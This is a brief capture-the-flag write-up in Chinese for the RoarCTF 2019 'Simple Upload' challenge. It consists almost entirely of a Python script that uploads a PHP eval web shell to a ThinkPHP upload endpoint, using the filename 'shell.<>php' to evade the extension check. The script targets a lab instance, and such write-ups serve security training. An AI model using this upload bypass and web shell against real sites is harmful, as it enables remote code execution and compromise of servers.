[RoarCTF 2019]Simple Upload

阅读 59

2022-04-19

thinkphp
默认上传路径是/home/index/upload

import requests
url = "http://c2e68701-24aa-42d8-ac2c-bf3c1b2b7d4f.node4.buuoj.cn:81/index.php/home/index/upload/"
s = requests.Session()
files = {"file": ("shell.<>php", "<?php eval($_GET['cmd'])?>")}
r = requests.post(url, files=files)
print(r.text)

 

精彩评论(0)

0 0 举报